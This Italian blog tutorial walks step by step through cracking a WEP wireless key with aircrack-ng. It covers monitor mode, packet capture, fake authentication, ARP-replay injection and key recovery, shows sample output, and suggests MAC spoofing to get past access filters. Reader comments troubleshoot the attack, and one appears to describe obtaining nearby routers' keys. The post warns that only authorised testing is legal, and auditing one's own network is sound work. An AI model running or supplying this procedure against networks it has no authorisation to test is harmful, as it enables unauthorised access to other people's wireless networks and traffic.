StefanoLaguardia.eu

Rete wireless (in)sicura: crack delle chiavi wep con aircrack-ng

Come vi avevo promesso, dopo avervi mostrato in che modo è possibile caricare i drivers della scheda di rete Intel Wireless Pro 2200BG con anche la patch per l’abilitazione della packet injection, in questa piccola guida vi mostro in che modo procedere ad una verifica della sicurezza della vostra rete wireless. In particolare vedremo quanto è semplice e veloce accedere ad una rete wireless protetta con le chiavi WEP. Ovviamente tutto quanto viene esposto in questa piccola guida può essere riprodotto solo ed esclusivamente sulla propria rete wireless o su una rete dove siamo stati in precedenza autorizzati a verificarne il grado di sicurezza. E’ reato penale procedere con le tecniche mostrate su reti pubbliche o dove non siamo stati autorizzati! Siete avvertiti!

Per effettuare i test di penetrazione nella vostra rete wireless abbiamo bisogno di avere una distribuzione GNU/Linux installata e funzionante, una scheda di rete wireless abilitata ad effettuare la packet injection ed, infine, il noto software aircrack-ng (possibilmente l’ultima versione disponibile). Un aspetto molto importante è quello di verificare che la scheda di rete sia abilitata ad effettuare la packet injection. Quest’ultima tecnica consiste nell’inviare forzatamente ad un Access Point alcuni pacchetti per ottenere dati necessari ad effettuare, successivamente, il crack della chiave WEP. Per verificare se la vostra scheda supporta la packet injection e per conoscere in che modo abilitarla, fate riferimento a questa pagina. Se, poi, avete installato una versione di aircrack uguale o successiva alla 1.0_beta avrete installato anche un tool per il download e l’installazione dei drivers necessari all’abilitazione della packet injection per la vostra scheda (si chiama airdriver-ng)… ma procediamo per gradi.

Se non avete installato aircrack-ng ed avete a disposizione una distribuzione Linux come debian o ubuntu procedete con l’installazione in questo modo (dopo esservi loggati come utente root -> sudo -s per ubuntu o su per debian):

# apt-get install aircrack-ng

A questo punto dobbiamo abilitare la modalità promiscua della scheda di rete wireless. Nel mio esempio farò riferimento alla mia scheda di rete con chipset Atheros (si tratta di una Proxim Orinoco Gold PCMCIA) che viene identificata come wifi0. Ecco come si procede:

# airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
eth2 Centrino b/g ipw2200
wlan0 Atheros madwifi-ng VAP (parent: wifi0)
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Come avrete notato, il comando airmon-ng ha abilitato il monitor mode sulla scheda ath0, creata al volo come “parente” della wifi0. Non è detto che anche per la vostra scheda venga creato al volo un nuovo device. Questo dipende dal driver e dalla scheda di rete in uso. L’importante è che leggiate che la scheda abbia il “monitor mode enabled”.

Terminata questa operazione siamo pronti ad avviare lo sniffer dei pacchetti in modo da verificare se il vostro access point è attivo e per ricavare alcuni dati fondamentali come il MAC address (BSSID) dell’access point, il canale su cui trasmette ed, infine, se ci sono altri computer connessi ad esso. Queste ultime informazioni sono fondamentali per effettuare la packet injection!
Qui di seguito vi riporto il comando da eseguire ed il suo output:

# airodump-ng ath0
[CH 11 ][ Elapsed: 4 s ][ 2008-05-03 17:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:XX:XX:XX:XX:XX 22 6 0 0 6 48 WEP WEP TEST
BSSID STATION PWR Rate Lost Packets Probes

Nel mio caso c’è un solo Access Point il cui nome è TEST (ESSID), il cui MAC (BSSID) è, ovviamente, oscurato, il cui canale di lavoro è il 6 e che è protetto da chiave WEP. Inoltre, non risultano altri computer associati ad esso.
Una volta scoperti questi dati possiamo interrompere airodump-ng premendo la sequenza di tasti ctrl+C. Infatti, da questo momento in poi dobbiamo specificare ad airodump di effettuare la captazione dei dati solo sul canale 6 (dove lavora il nostro AP) e dobbiamo, per convenienza, indicare il nome del file dove salvare i dati captati. Procedete come segue:

# airodump-ng -c 6 -w file_di_cattura.ivs ath0

A questo punto si avvierà airodump-ng in ascolto sul solo canale n. 6 (opzione -c 6) e salvando tutto quello che capta nel file “file_di_cattura.ivs.cap” (opzione -w). Lasciate acceso il terminale con airodump-ng e accedete ad un altro terminale. In quest’ultimo dobbiamo effettuare una finta autenticazione al nostro access point. Cosa vuol dire? Dobbiamo far credere all’Access Point wireless che noi siamo autentucati su di lui ed autorizzati ad usarlo. Attenti perchè in questa fase se l’Access Point ha attiva la protezione sui MAC address abilitati ad usarlo, dobbiamo avere una scheda di rete con MAC autorizzato. Nel caso in cui la scheda che stiamo usando non sia autorizzata ad accedere all’AP, possiamo abilitarla nell’Access Point, dal pannello di amministrazione, oppure, conoscendo il MAC address di una scheda di rete autorizzata, possiamo modificare il mac address della scheda di rete usata per “attaccare” l’access point (ad esempio utilizzando il software “macchanger”). Dunque, possiamo procedere con la falsa autenticazione utilizzando questo comando:

# aireplay-ng -1 0 -e (ESSID – nel mio caso TEST) -b (MAC Access Point) -h (MAC scheda di rete) ath0 (o il nome del vostro device)
18:02:17 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
18:02:17 Sending Authentication Request (Open System) [ACK]
18:02:17 Authentication successful
18:02:17 Sending Association Request [ACK]
18:02:17 Association successful 🙂

Come avrete notato, l’output del comando che abbiamo lanciato ci dice che l’attacco della falsa autenticazione è andato a buon fine. A questo punto non ci resta che effettuare la packet injection. Aprite un terzo terminale e digitate il seguente comando:

# aireplay-ng -3 -b (MAC Access Point) -h (MAC scheda di rete) ath0 (o il nome del vostro device)

L’output di quest’ultimo comando sarà come questo:

18:07:23 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay_arp-0503-180723.cap
You should also start airodump-ng to capture replies.
Read 157 packets (got 0 ARP requests and 0 ACKs), sent 0 packets…(0 pps)

Volutamente ho riportato in grassetto una parte dell’output.. è quella che dopo qualche secondo (o minuto) richiede la vostra attenzione. Infatti, vedrete che inizieranno ad aumentare le ARP requests e quelli sono i dati che stiamo collezionando grazie ad airodump aperto nell’altro terminale.Eccovi un esempio di aumento dei pacchetti ARP:

18:07:23 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay_arp-0503-180723.cap
You should also start airodump-ng to capture replies.
Read 101922 packets (got 54381 ARP requests and 31849 ACKs), sent 49287 packets…(499 pps)

Dopo che avrete collezionato almeno 50.000 pacchetti (collezionatene molti di più vista la velocità impressionante con la quale aumentano) siete pronti ad effettuare il crack vero e proprio. Interrompete, dunque, sia l’arpreplay che l’airodump premendo ctrl+c nei due terminali aperti. Spostatevi nel terminale dove girava airodump-ng e dove vi ritroverete con un output simile a questo:

CH 6 ][ Elapsed: 11 mins ][ 2008-05-03 18:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX 176 100 6474 117592 0 6 48 WEP WEP OPN TEST
BSSID STATION PWR Rate Lost Packets Probes
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX 220 1- 1 2928 132104

Come avrete notato,mel mio caso ho collezionato oltre 110.000 pacchetti di dati utili per effettuare il crack. Quindi, sono pronto a lanciare aircrack-ng in questo modo:

# aircrack-ng file_di_cattura.ivs.cap

Vi sembrerà incredibile, ma con poco più di 100.000 pacchetti catturati ci vuole meno di un secondo ad individuare la chiave di rete:

Aircrack-ng 1.0 beta2
[00:00:00] Tested 808 keys (got 117588 IVs)
KB depth byte(vote)
0 0/ 1 2D(175872) 72(135680) EE(132352) 07(130304) AD(129024) DF(129024) 81(128768) 8C(128512) BC(128256) EB(128000) 6C(127744) 5C(127488)
1 22/ 1 AC(125952) 57(125184) A6(125184) D6(125184) 15(124672) 69(124672) 7B(124672) E9(124672) D4(124416) FD(124416)6C(124160) E8(124160) 2 1/ 22 4D(132352) C4(131328) C9(130048) 5A(129280) 6D(129280) 3E(129024) D0(129024) 45(127744) DA(127488) A2(127232) 69(126976) CD(126976) 3 0/ 2 E4(163328) A5(131072) 43(130560) 4A(129792) 80(128768) BE(128768) 41(128256) D7(128000) 79(127744) 9B(127488) 7A(127232) E8(127232)4 38/ 4 ED(123392) 4F(123136) 68(122624) 84(122624) D9(122624) 5E(122368) 88(122368) 1A(122112) C0(122112) CE(122112) 05(121856) 59(121856)
KEY FOUND! [ XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ]
Decrypted correctly: 100%

18 Responses

  1. upnews.it says:

    stefanolaguardia.eu » Rete wireless (in)sicura: crack delle chiavi wep con aircrack-ng…

    (In)sicurezza wireless. Crack delle chiavi wep con aircrack-ng…

  2. diggita.it says:

    stefanolaguardia.eu » Rete wireless (in)sicura: crack delle chiavi wep con aircrack-ng…

    In questa guida viene mostrato come è semplice effettuare il crack di una chiave wep su una rete wireless. Il tutto in pochissimo minuti (circa 10 minuti). Salvaguardate le vostre reti Wireless!…

  3. maurizio says:

    scusate l’ignoranza ma su eee pc con xandros quando digito sudo apt-get install aircrack eccc
    mi dice impossibile trovare eppure mi fa vedere la directory scompattata ma non mi fa intallare perche’? chi mi aiuta
    grazie

  4. admin says:

    Ciao,
    non ho mai usato Xandros. Il comando apt-get install va bene per le distribuzioni derivate da Debian. Se anche Xandros è derivata da debian ed usa il tool apt-get per l’installazione e ti dice che non c’è aircrack, vuol dire che non c’è aircrack nei depositi di software di xandros. Fammi sapere se in genere usi apt-get per installare soft, perchè nella peggiore delle ipotesi Aircrack dovrai compilarlo dai sorgenti (un po’ stressante se non sei abbastanza esperto) oppure verificare se esiste un deposito aircrack per la tua distribuzione 🙂

    Ciao,
    Stefano

  5. diego89 says:

    ciao stefano. il mio problema è gia subito all’inizio…..nel tuo caso la tua scheda di rete viene identificata con wifi0…..la mia no (visto che non viene fuori la scritta nel terminale “monitor mode enable”)….non ho ben capito dove trovo il codice di identificazione…..

  6. stefano says:

    ciao diego.
    Mi sapresti dire il modello della tua scheda e quali drivers hai utilizzato?
    Ad ogni modo se provi a digitare il comando “ifconfig -a” da un terminale di root (ovviamente senza apici) ti dovrebbe essere riportata la lista di TUTTE le periferiche di rete disponibili sul tuo pc. Dalla lista dovremmo riuscire ad identificare il nome assegnato alla tua scheda.
    Se, al contrario, ifconfig -a non fosse sufficiente e la tua è una sk. “estraibilie”, prova a rimuovere la scheda wireless e reintrodurla nel suo slot. Dopo aver compiuta questa operazione, lancia “dmesg” nel terminale e scopri ancora più informazioni 🙂
    Fammi sapere

  7. Gianluca says:

    ciao Stefano,
    A me dopo il sending Authentication Request mi da Attack was unsuccessful… mi sapresti aiutare???

  8. stefano says:

    @ Gianluca:
    In genere l’auth non riuscito può dipendere dalla scheda wireless non abilitata alla Packet injection oppure al fatto che sei troppo lontano dall’access point o ancora al fatto che l’access point ha la restrizione sul MAC address abilitata. In tale ultimo caso se non sei un client autorizzato sull’access point non riesci a fare la fake auth!

  9. LUIGI says:

    salve
    io sono poco esperto
    posso riurscirci?????
    ho una chiavetta wireless da 108 mbps tp-link tl-wn620G

    HO SCARICATO AIRCRACK-NG HO APERTO LA CARTELLA E MI SONO USCITE ALTRE CARTELLE
    HO APERTO LA CART. BIN ED HO CLICCAO SU UN ICONA WZCOOK
    MI SONO USCITI I NOMI DI ALCUNI RUTER QUI IN ZONA CON DEI NUMERI A FIANCO
    HO CONTROLLATO UNO DI QUESTI ESSENDO MIO AMICO ED HO VISTO CHE E ESATTO
    ALLA SUA CHIAVE WEP , IL N. COINCIDE
    VOGLIO SAPERE E DAVVERO COSI’ FACILE
    HO MI ESCE PERCHE IO L’AVEVO GIA’ SCRITTO UNA VOLTA, E MI ERO CONNESSO???
    MA NE ESCONO ANCHE ALTRI
    E CHI E SENZA CHIAVE MI ESCONO TUTTI OOOO
    ALLORA E COSI’ ???? AIUTATEMI DATEMI UNA RIPOTA VI PREGO???

  10. stefano says:

    @ LUIGI:
    E’ da parecchio che non gioco con aircrack.. ma mi sembra davvero un po’ troppo semplice quello che hai fatto 😀

  11. dieghen89 says:

    ciao….ho un problemino…..
    aircrack mi ha trovato questa chiave esadecimale:
    KEY FOUND! [ 4B:C3:D5:5C:00 ]
    Decrypted correctly: 100%

    I rispettivi valori in ASCII non ci sono…..come faccio a connettermi????
    P.S. Ho Ubuntu 8.10
    Ringrazio già per l’aiuto…

  12. stefano says:

    dieghen89 wrote:

    ciao….ho un problemino…..
    aircrack mi ha trovato questa chiave esadecimale:
    KEY FOUND! [ 4B:C3:D5:5C:00 ]
    Decrypted correctly: 100%
    I rispettivi valori in ASCII non ci sono…..come faccio a connettermi????
    P.S. Ho Ubuntu 8.10
    Ringrazio già per l’aiuto…

    E’ semplice. Apri un terminale e digiti questo comando:

    sudo iwconfig ethX essid enc 4B:C3:D5:5C:00

    Dove al posto di ethX metti la tua scheda di rete wireless.
    Se hai problemi chiedi pure 🙂

  13. dogek81 says:

    ciao, ho seguito alla lettera la guida e sembra andare tutto bene ma il numero dei pacchetti non sale mai aireplay legge i pacchetti che gli arrivano ma ARP e ACKS non salgono mai, nemmeno dopo un ora e tu ci hai messo 10 min…
    l’unica differenza che ho notato con le schermate della guida è che in quella dell autenticazione fake non ci sono le scritte tra le parentesi quadre [ack]
    per il resto è tutto uguale e l’esito dell’autenticazione è positivo…puoi darmi una mano?ti ringrazio gia adesso

  14. stefano says:

    @ dogek81:
    L’unica cosa che ti posso dire è di riprovare più volte.
    Può capitare che l’attacco non vada a buon fine e che aireplay debba essere rilanciato più volte prima di iniziare a far catturare pacchetti!

  15. Nicolò says:

    Io faccio fatica a far crescere il numero degli IVs (non arrivo mai oltre i 200 IVs e ovviamente non sono sufficienti 🙁 ).
    L’impressione è che ci sia il blocco del MAC sull’AP.

    >>Attenti perchè in questa fase se l’Access Point ha attiva la protezione sui MAC address abilitati ad usarlo, dobbiamo avere una scheda di rete con MAC autorizzato. Nel caso in cui la scheda che stiamo usando non sia autorizzata ad accedere all’AP, possiamo abilitarla nell’Access Point, dal pannello di amministrazione, oppure, conoscendo il MAC address di una scheda di rete autorizzata, possiamo modificare il mac address della scheda di rete usata per “attaccare” l’access point (ad esempio utilizzando il software “macchanger”)
    <<

    Domanda: se è sufficiente usare macchanger per “fregare” l’AP riesco cambiare il mio MAC address e impostarlo uguale a quello del client connesso (e autorizzato) o vi è un conflitto ? 🙂

    Grazie.

  16. Federico says:

    credo di avere un problema. dopo che ho fatto airodump-ng e copiato il mac dell’AP faccio aireplay-ng e dopo qualche secondo mi dice no such bssid available. è possibile che mi dia questo perché non arrivano beacon per la precisione sono 3

  17. cla says:

    @ stefano:
    Però se ho ben capito questo comando imposta la scheda di rete ad usare quella chiave, se invece ho proprio bisogno della stringa in ascii per poterla usare su un altro sistema operativo?

  18. stefano says:

    Ciao Cla.
    In realtà i comandi usati nel tutorial non impostano la scheda di rete del tuo pc per funzionare sulla rete “craccata”. Al contrario, servono solo ad individuare la chiave da usare poi nelle normali configurazioni di rete.
    Spero di essere stato chiaro 🙂

Comments

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.